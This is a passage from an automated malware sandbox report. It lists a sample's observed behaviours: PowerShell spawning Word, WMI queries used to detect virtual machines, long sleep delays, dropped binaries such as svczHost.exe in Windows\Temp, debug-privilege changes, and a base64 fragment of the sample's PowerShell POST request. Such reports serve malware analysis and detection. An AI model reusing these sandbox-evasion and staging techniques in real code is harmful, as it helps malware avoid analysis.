Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE			Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Source: C:\Windows\Temp\svczHost.exe	Memory allocated: 1B8FF610000 memory reserve \| memory write watch
Source: C:\Windows\Temp\myRdpService.exe	Memory allocated: 1F8B94D0000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9920	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9895	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9925	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9903
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 360
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9824
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9881
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9842
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9907
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9919

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6384	Thread sleep count: 9920 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8688	Thread sleep count: 9925 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8744	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8820	Thread sleep count: 9824 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144	Thread sleep count: 9881 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6152	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812	Thread sleep count: 9842 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8904	Thread sleep count: 9907 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8572	Thread sleep count: 9919 > 30

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\net1.exe	Last function: Thread delayed
Source: C:\Windows\Temp\myRdpService.exe	Last function: Thread delayed
Source: C:\Windows\Temp\myRdpService.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 0000000D.00000002.4429804587.000002A49A948000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWUg%SystemRoot%\system32\mswsock.dllcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIA{
Source: svczHost.exe, 00000014.00000002.4754714057.000001B8FEF33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
Source: powershell.exe, 0000000D.00000002.3932623749.000002A4831CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000008.00000002.3643874588.000001B5FD027000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: powershell.exe, 0000000D.00000002.4350731384.000002A492626000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 0000000D.00000002.3932623749.000002A4831CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: powershell.exe, 0000000D.00000002.3932623749.000002A4831CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.3756553973.000001F3FBE40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\svczHost.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
